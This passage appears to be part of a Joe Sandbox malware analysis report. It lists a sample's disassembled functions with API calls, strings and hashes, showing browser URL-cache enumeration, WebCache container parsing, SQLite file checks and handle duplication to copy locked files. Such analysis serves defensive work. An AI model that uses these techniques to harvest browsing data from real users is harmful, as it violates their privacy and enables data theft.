                                                                                                                                                                                                                                                                                                                              • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                                                                                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                                                                                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                                                                                                                                                                              • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                                                                                                                                                                                                                              • String ID: visited:
                                                                                                                                                                                                                                                                                                                              • API String ID: 2470578098-1702587658
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                                                                                                                                                                                                                                                              Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                                              control_flow_graph 721 40e175-40e1a1 call 40695d call 406b90 726 40e1a7-40e1e5 memset 721->726 727 40e299-40e2a8 call 4069a3 721->727 729 40e1e8-40e1fa call 406e8f 726->729 733 40e270-40e27d call 406b53 729->733 734 40e1fc-40e219 call 40dd50 * 2 729->734 733->729 739 40e283-40e286 733->739 734->733 745 40e21b-40e21d 734->745 742 40e291-40e294 call 40aa04 739->742 743 40e288-40e290 free 739->743 742->727 743->742 745->733 746 40e21f-40e235 call 40742e 745->746 746->733 749 40e237-40e242 call 40aae3 746->749 749->733 752 40e244-40e26b _snwprintf call 40a8d0 749->752 752->733
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                                                                                                                              • free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                                                                                                                                                                              • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                                                                                                                                                                              • API String ID: 2804212203-2982631422
                                                                                                                                                                                                                                                                                                                              • Opcode ID: edbd84529ef28b733ccf9b4c221d4d7de735e56aa7ab74abb92493a4e91cfa25
                                                                                                                                                                                                                                                                                                                              • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: edbd84529ef28b733ccf9b4c221d4d7de735e56aa7ab74abb92493a4e91cfa25
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                                                                                                                                                                                                                                                              Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                                              control_flow_graph 822 41837f-4183bf 823 4183c1-4183cc call 418197 822->823 824 4183dc-4183ec call 418160 822->824 829 4183d2-4183d8 823->829 830 418517-41851d 823->830 831 4183f6-41840b 824->831 832 4183ee-4183f1 824->832 829->824 833 418417-418423 831->833 834 41840d-418415 831->834 832->830 835 418427-418442 call 41739b 833->835 834->835 838 418444-41845d CreateFileW 835->838 839 41845f-418475 CreateFileA 835->839 840 418477-41847c 838->840 839->840 841 4184c2-4184c7 840->841 842 41847e-418495 GetLastError free 840->842 845 4184d5-418501 memset call 418758 841->845 846 4184c9-4184d3 841->846 843 4184b5-4184c0 call 444706 842->843 844 418497-4184b3 call 41837f 842->844 843->830 844->830 850 418506-418515 free 845->850 846->845 850->830
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                                                                                                                                                                              • free.MSVCRT ref: 0041848B
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CreateFile$ErrorLastfree
                                                                                                                                                                                                                                                                                                                              • String ID: |A
                                                                                                                                                                                                                                                                                                                              • API String ID: 77810686-1717621600
                                                                                                                                                                                                                                                                                                                              • Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                                                                                                                                                                                                                              Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0041249C
                                                                                                                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                                                                                                                                                                                                                                              • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                                                                                                                                                                                                                                              • wcscpy.MSVCRT ref: 004125A0
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                                                                                                                                                                              • String ID: r!A
                                                                                                                                                                                                                                                                                                                              • API String ID: 2791114272-628097481
                                                                                                                                                                                                                                                                                                                              • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                                                                                                                                                                                                                                                              • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                                                                                                                                                                                                                              Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                                                                                                                              • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                                                                                                                                                                              • API String ID: 3510742995-2641926074
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                                                                                                                                                                                              Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 004033B7
                                                                                                                                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                                                                                                                                                                                                              • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                                                                                                                                                                                              • String ID: $0.@
                                                                                                                                                                                                                                                                                                                              • API String ID: 2758756878-1896041820
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                                                                                                                                                                                                                                              • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                                                                                                                                                                                              Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                                                                                                                                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                                                                                                                                                                              • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                                                                                                                                                              • String ID: "%s"
                                                                                                                                                                                                                                                                                                                              • API String ID: 1343145685-3297466227
                                                                                                                                                                                                                                                                                                                              • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                                                                                                                                                                                              Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                                                                                                                                                                                                                                              • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                                                                                                                                                                                                                                              • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: memcmp
                                                                                                                                                                                                                                                                                                                              • String ID: @ $SQLite format 3
                                                                                                                                                                                                                                                                                                                              • API String ID: 1475443563-3708268960
                                                                                                                                                                                                                                                                                                                              • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                                                                                                                                                                                                                                                              • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                                                                                                                                                                                              Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _wcsicmpqsort
                                                                                                                                                                                                                                                                                                                              • String ID: /nosort$/sort
                                                                                                                                                                                                                                                                                                                              • API String ID: 1579243037-1578091866
                                                                                                                                                                                                                                                                                                                              • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                                                                                                                                                                                              Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ??2@
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1033339047-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                                                                                                                                                                              Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E3EC
                                                                                                                                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
